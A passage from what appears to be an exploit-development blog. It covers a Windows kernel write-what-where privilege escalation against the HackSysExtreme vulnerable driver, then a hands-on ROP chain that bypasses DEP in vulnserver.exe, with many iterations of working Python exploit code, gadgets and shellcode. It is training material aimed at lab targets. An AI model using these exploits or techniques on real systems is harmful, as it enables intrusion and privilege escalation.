write_what_where_pointer = pointer(write_what_where)

# Print update statement to reflect said exploit
print "[+] What: {0}".format(hex(write_what_where.What))
print "[+] Where: {0}".format(hex(write_what_where.Where))


# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    write_what_where_pointer,           # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)
    
# Actually calling NtQueryIntervalProfile function, which will call HAL + 0x4, where our shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulong())
)

# Print update for nt_autority\system shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!!!!"
Popen("start cmd", shell=True)

There is a lot to digest here. Let’s look at the following:

# Referencing class created at the beginning of the sploit and passing shellcode to vulnerable pointers
# This is where the exploit occurs
write_what_where = WriteWhatWhere()
write_what_where.What = payload_final   # What we are writing (our shellcode)
write_what_where.Where = real_hal       # Where we are writing it to (HAL + 0x4). NtQueryIntervalProfile() will eventually call this location and execute it
write_what_where_pointer = pointer(write_what_where)

# Print update statement to reflect said exploit
print "[+] What: {0}".format(hex(write_what_where.What))
print "[+] Where: {0}".format(hex(write_what_where.Where))

Here, is where the What and Where come into play. We create a variable called write_what_where and we call the What pointer from the class created called WriteWhatWhere(). That value gets set to equal the address of a pointer to our shellcode. The same thing happens with Where, but it receives the value of HalDispatchTable + 0x4. And in the end, a pointer to the variable write_what_where, which has inherited all of our useful information about our pointer to the shellcode and HalDispatchTable + 0x4, is passed in the DeviceIoControl() function, which actually interacts with the driver.

One last thing. Take a peak here:

# Actually calling NtQueryIntervalProfile function, which will call HAL + 0x4, where our shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulong())
)

The whole reason this exploit works in the first place, is because after everything is in place, we call NtQueryIntervalProfile(). Although this function never receives any of our parameters, pointers, or variables- it does not matter. Our shellcode will be located at HalDispatchTable + 0x4 BEFORE the call to NtQueryIntervalProfile(). Calling NtQueryIntervalProfile() ensures that location of HalDispatchTable + 0x4 (because NtQueryIntervalProfile() calls KeQueryIntervalProfile(), which calls HalDispatchTable + 0x4) gets executed. And then just like that- our payload will be executed!

All Together Now

Final execution of the exploit- and we have an administrative shell!! Pwn all of the things!

Wrapping Up

Thanks again to the HackSysExtreme team for their vulnerable driver, and other fellow security researchers like rootkit for their research! As I keep going down the kernel route, I hope to be making it over to x64 here in the near future! Please contact me with any questions, comments, or corrections!

Peace, love, and positivity! :-)

Exploit Development: Hands Up! Give Us the Stack! This Is a ROPpery!

21 September 2019 at 00:00

Introduction

Over the years, the security community as a whole realized that there needed to be a way to stop exploit developers from easily executing malicious shellcode. Microsoft, over time, has implemented a plethora of intense exploit mitigations, such as: EMET (the Enhanced Mitigation Experience Toolkit), CFG (Control Flow Guard), Windows Defender Exploit Guard, and ASLR (Address Space Layout Randomization).

DEP, or Data Execution Prevention, is another one of those roadblocks that hinders exploit developers. This blog post will only be focusing on defeating DEP, within a stack-based data structure on Windows.

A Brief Word About DEP

Windows XP SP2 32-bit was the first Windows operating system to ship DEP. Every version of Windows since then has included DEP. DEP, at a high level, gives memory two independent permission levels. They are:

  • The ability to write to memory.

    OR

  • The ability to execute memory.

But not both.

What this means, is that someone cannot write AND execute memory at the same time. This means a few things for exploit developers. Let’s say you have a simple vanilla stack instruction pointer overwrite. Let’s also say the first byte, and all of the following bytes of your payload, are pointed to by the stack pointer. Normally, a simple jmp stack pointer instruction would suffice- and it would rain shells. With DEP, it is not that simple. Since that shellcode is user introduced shellcode- you will be able to write to the stack. BUT, as soon as any execution of that user supplied shellcode is attempted- an access violation will occur, and the application will terminate.

DEP manifests itself in four different policy settings. From the MSDN documentation on DEP, here are the four policy settings:

Knowing the applicable information on how DEP is implemented, figuring how to defeat DEP is the next viable step.

Windows API, We Meet Again

In my last post, I explained and outlined how powerful the Windows API is. Microsoft has released all of the documentation on the Windows API, which aids in reverse engineering the parameters needed for API function calls.

Defeating DEP is no different. There are many API functions that can be used to defeat DEP. A few of them include:

The only limitation to defeating DEP, is the number of applicable APIs in Windows that change the permissions of the memory containing shellcode.

For this post, VirtualProtect() will be the Windows API function used for bypassing DEP.

VirtualProtect() takes the following parameters:

BOOL VirtualProtect(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flNewProtect,
  PDWORD lpflOldProtect
);

lpAddress = A pointer an address that describes the starting page of the region of pages whose access protection attributes are to be changed.

dwSize = The size of the region whose access protection attributes are to be changed, in bytes.

flNewProtect = The memory protection option. This parameter can be one of the memory protection constants. (0x40 sets the permissions of the memory page to read, write, and execute.)

lpflOldProtect = A pointer to a variable that receives the previous access protection value of the first page in the specified region of pages. (This should be any address that already has write permissions.)

Now this is all great and fine, but there is a question one should be asking themselves. If it is not possible to write the parameters to the stack and also execute them, how will the function get ran?

Let’s ROP!

This is where Return Oriented Programming comes in. Even when DEP is enabled, it is still possible to perform operations on the stack such as push, pop, add, sub, etc.

“How is that so? I thought it was not possible to write and execute on the stack?” This is a question you also may be having. The way ROP works, is by utilizing pointers to instructions that already exist within an application.

Let’s say there’s an application called vulnserver.exe. Let’s say there is a memory address of 0xDEADBEEF that when viewed, contains the instruction add esp, 0x100. If this memory address got loaded into the instruction pointer, it would execute the command it points to. But nothing user supplied was written to the stack.

What this means for exploit developers, is this. If one is able to chain a set of memory addresses together, that all point to useful instructions already existing in an application/system- it might be possible to change the permissions of the memory pages containing malicious shellcode. Let’s get into how this looks from a practicality/hands-on approach.

If you would like to follow along, I will be developing this exploit on a 32-bit Windows 7 virtual machine with ASLR disabled. The application I will be utilizing is vulnserver.exe.

A Brief Introduction to ROP Gadgets and ROP Chains

The reason why ROP is called Return Oriented Programming, is because each instruction is always followed by a ret instruction. Each ASM + ret instruction is known as a ROP gadget. Whenever these gadgets are loaded consecutively one after the other, this is known as a ROP chain.

The ret is probably the most important part of the chain. The reason the return instruction is needed is simple. Let’s say you own the stack. Let’s say you are able to load your whole ROP chain onto the stack. How would you execute it?

Enter ret. A return instruction simply takes whatever is located in the stack pointer (on top of the stack) and loads it into the instruction pointer (what is currently being executed). Since the ROP chain is located on the stack and a ROP chain is simply a bunch of memory addresses, the ret instruction will simply return to the stack, pick up the next memory address (ROP gadget), and execute it. This will keep happening, until there are no more left! This makes life a bit easier.

POC

Enough jibber jabber- here is the POC for vulnserver.exe:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+filler)
s.close()

..But …But What About Jumping to ESP?

There will not be a jmp esp instruction here. Remember, with DEP- this will kill the exploit. Instead, you’ll need to find any memory address that contains a ret instruction. As outlined above, this will directly take us back to the stack. This is normally called a stack pivot.

Where Art Thou ROP Gadgets?

The tool that will be used to find ROP gadgets is rp++. Some other options are to use mona.py or to search manually. To search manually, all one would need to do is locate all instances of ret and look at the above instructions to see if there is anything useful. Mona will also construct a ROP chain for you that can be used to defeat DEP. This is not the point of this post. The point of this post is that we are going to manually ROP the vulnserver.exe program. Only by manually doing something first, are you able to learn.

Let’s first find all of the dependencies that make up vulnserver.exe, so we can map more ROP chains beyond what is contained in the executable. Execute the following mona.py command in Immunity Debugger:

!mona modules:

Next, use rp++ to enumerate all useful ROP gadgets for all of the dependencies. Here is an example for vulnserver.exe. Run rp++ for each dependency:

The -f options specifies the file. The -r option specifies maximum number of instructions the ROP gadgets can contain (5 in our case).

After this, the POC needs to be updated. The update is going to reserve a place on the stack for the API call to the function VirtualProtect(). I found the address of VirtualProtect() to be at address 0x77e22e15. Remember, in this test environment- ASLR is disabled.

To find the address of VirtualProtect() on your machine, open Immunity and double-click on any instruction in the disassembly window and enter

call kernel32.VirtualProtect:

After this, double click on the same instruction again, to see the address of where the call is happening, which is kernel32.VirtualProtect in this case. Here, you can see the address I referenced earlier:

Also, you need to find a flOldProtect address. You can literally place any address in this parameter, that contains writeable permissions.

Now the POC can be updated:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding between future ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+shellcode+filler)
s.close()

Before moving on, you may have noticed an arbitrary parameter variable for a parameter called return address added into the POC. This is not a part of the official parameters for VirtualProtect(). The reason this address is there (and right under the VirtualProtect() function) is because whenever the call to the function occurs, there needs to be a way to execute our shellcode. The address of return is going to contain the address of the shellcode- so the application will jump straight to the user supplied shellcode after VirtualProtect() runs. The location of the shellcode will be marked as read, write, and execute.

One last thing. The reason we are adding the shellcode now, is because of one of the properties of DEP. The shellcode will not be executed until we change the permissions of DEP. It is written in advance because DEP will allow us to write to the stack, so long as we are not executing.

Set a breakpoint at the address 0x62501022 and execute the updated POC. Step through the breakpoint with F7 in Immunity and take a look at the state of the stack:

Recall that the Windows API, when called, takes the items on the top of the stack (the stack pointer) as the parameters. That is why the items in the POC under the VirtualProtect() call are seen in the function call (because after EIP all of the supplied data is on the stack).

As you can see, all of the parameters are there. Here, at a high level, is we are going to change these parameters.

It is pretty much guaranteed that there is no way we will find five ROP gadgets that EXACTLY equal the values we need. Knowing this, we have to be more creative with our ROP gadgets and how we go about manipulating the stack to do what we need- which is change what values the current placeholders contain.

Instead what we will do, is put the calculated values needed to call VirtualProtect() into a register. Then, we will change the memory addresses of the placeholders we currently have, to point to our calculated values. An example would be, we could get the value for lpAddress into a register. Then, using ROP, we could make the current placeholder for lpAddress point to that register, where the intended value (real value) of lpAddress is.

Again, this is all very high level. Let’s get into some of the more low-level details.

Hey, Stack Pointer- Stay Right There. BRB.

The first thing we need to do is save our current stack pointer. Taking a look at the current state of the registers, that seems to be 0x018DF9E4:

As you will see later on- it is always best to try to save the stack pointer in multiple registers (if possible). The reason for this is simple. The current stack pointer is going to contain an address that is near and around a couple of things: the VirtualProtect() function call and the parameters, as well as our shellcode.

When it comes to exploitation, you never know what the state of the registers could be when you gain control of an application. Placing the current stack pointer into some of the registers allows us to easily be able to make calculations on different things on and around the stack area. If EAX, for example, has a value of 0x00000001 at the time of the crash, but you need a value of 0x12345678 in EAX- it is going to be VERY hard to keep adding to EAX to get the intended value. But if the stack pointer is equal to 0x12345670 at the time of the crash, it is much easier to make calculations, if that value is in EAX to begin with.

Time to break out all of the ROP gadgets we found earlier. It seems as though there are two great options for saving the state of the current stack pointer:

0x77bf58d2: push esp ; pop ecx ; ret  ;  RPCRT4.dll

0x77e4a5e6: mov eax, ecx ; ret  ;  user32.dll

The first ROP gadget will push the value of the stack pointer onto the stack. It will then pop it into ECX- meaning ECX now contains the value of the current stack pointer. The second ROP gadget will move the value of ECX into EAX. At this point, ECX and EAX both contain the current ESP value.

These ROP gadgets will be placed ABOVE the current parameters. The reason is, that these are vital in our calculation process. We are essentially priming the registers before we begin trying to get our intended values into the parameter placeholders. It makes it easier to do this before the VirtualProtect() call is made.

The updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+shellcode+filler)
s.close()

The state of the registers after the two ROP gadgets (remember to place breakpoint on the stack pivot ret instruction and step through with F7 in each debugging step):

As you can see from the POC above, the parameters to VirtualProtect are next up on the stack after the first two ROP gadgets are executed. Since we do not want to overwrite those parameters, we simply would like to “jump” over them for now. To do this, we can simply add to the current value of ESP, with an add esp, VALUE + ret ROP gadget. This will change the value of ESP to be a greater value than the current stack pointer (which currently contains the call to VirtualProtect()). This means we will be farther down in the stack (past the VirtualProtect() call). Since all of our ROP gadgets are ending with a ret, the new stack pointer (which is greater) will be loaded into EIP, because of the ret instruction in the add esp, VALUE + ret. This will make more sense in the screenshots that will be outlined below showing the execution of the ROP gadget. This will be the last ROP gadget that is included before the parameters.

Again, looking through the gadgets created earlier, here is a viable one:

0x6ff821d5: add esp, 0x1C ; ret  ;  USP10.dll

The updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
rop2 = struct.pack('<L', 0xDEADBEEF)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

As you can see, 0xDEADBEEF has been added to the POC. If all goes well, after the jump over the VirtualProtect() parameters, EIP should contain the memory address 0xDEADBEEF.

ESP is 0x01BCF9EC before execution:

ESP after add esp, 0x1C:

As you can see at this point, 0xDEADBEEF is pointed to by the stack pointer. The next instruction of this ROP gadget is ret. This instruction will take ESP (0xDEADBEEF) and load it into EIP. What this means, is that if successful, we will have successfully jumped over the VirtualProtect() parameters and resumed execution afterwards.

We have successfully jumped over the parameters!:

Now all of the semantics have been taken care of, it is time to start getting the actual parameters onto the stack.

Okay, For Real This Time

Notice the state of the stack after everything has been executed:

We can clearly see under the kernel32.VirtualProtect pointer, the return parameter located at 0x19FF9F0.

Remember how we saved our old stack pointer into EAX and ECX? We are going to use ECX to do some calculations. Right now, ECX contains a value of 0x19FF9E4. That value is C hex bytes, or 12 decimal bytes away from the return address parameter. Let’s change the value in ECX to equal the value of the return parameter.

We will repeat the following ROP gadget multiple times:

0x77e17270: inc ecx ; ret  ; kernel32.dll

Here is the updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

After execution of the ROP gadgets, ECX has been increased to equal the position of return:

Perfect. ECX now contains a value of the return parameter. Let’s knock out lpAddress while we are here. Since lpAddress comes after the return parameter, it will be located 4 bytes after the return parameter on the stack.

Since ECX already contains the return address, adding four bytes would get us to lpAddress. Let’s use ROP to get ECX copied into another register (EDX in this case) and increase EDX by four bytes!

ROP gadgets:

0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  msvcrt.dll
0x77f226d5: inc edx ; ret  ;  ntdll.dll

Before we move on, take a closer look at the first ROP gadget. The mov edx, ecx instruction is exactly what is needed. The next instruction is a pop ebp. This, as of right now in its current state, would kill our exploit. Recall, pop will take whatever is on the top of the stack away. As of right now, after the first ROP gadget is loaded into EIP- the second ROP gadget above would be located at ESP. The first ROP gadget would actually take the second ROP gadget and throw it in EBP. We don’t want that.

So, what we can do, is we can add “dummy” data directly AFTER the first ROP gadget. That way, that “dummy” data will get popped into EBP (which we do not care about) and the second ROP gadget will be successfully executed.

Updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)


# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

The below screenshots show the stack and registers right before the pop ebp instruction. Notice that EIP is currently one address space above the current ESP. ESP right now contains a memory address that points to 0x50505050, which is our padding.

Disassembly window before execution:

Current state of the registers (EIP contains the address of the mov edx, ecx instruction at the moment:

The current state of the stack. ESP contains the memory address 0x0189FA3C, which points to 0x50505050:

Now, here is the state of the registers after all of the instructions except ret have been executed. EDX now contains the same value as ECX, and EBP contains our intended padding value of 0x50505050!:

Remember that we still need to increase EDX by four bytes. The ROP gadgets after the mov edx, ecx + pop ebp + ret take care of this:

Now we have the memory address of the return parameter placeholder in ECX, and the memory address of the lpAddress parameter placeholder in EDX. Let’s take a look at the stack for a second:

Right now , our shellcode is about 100 hex bytes, or about 256 bytes away, from the current return and lpAddress placeholders. Remember when earlier we saved the old stack pointer into two registers: EAX and ECX? Recall also, that we have already manipulated the value of ECX to equal the value of the return parameter placeholder.

EAX still contains the original stack pointer value. What we need to do, is manipulate EAX to equal the location of our shellcode. Well, that isn’t entirely true. Recall in the updated POC, there is a padding variable of 250 NOPs. All we need is EAX to equal an address within those NOPS that come a bit before the shellcode, since the NOPs will slide into the shellcode.

What we need to do, is increase EAX by about 100 bytes, which should be close enough to our shellcode.

NOTE: This may change going forward. Depending on how many ROP gadgets we need for the ROP chain, our shellcode may get pushed farther down on the stack. If this happens, EAX would no longer be pointing to an area around our shellcode. Again, if this problem arises, we can just come back and repeat the process of adding to EAX again.

Here is a useful ROP gadget for this:

0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  msvcrt.dll

We will need two of these instructions. Also, keep in mind- we have a pop ebp instruction in this ROP gadget. This chain of ROP gadgets should be laid out like this:

  • add eax

  • 0x41414141 (padding to be popped into EBP)

Here is the updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
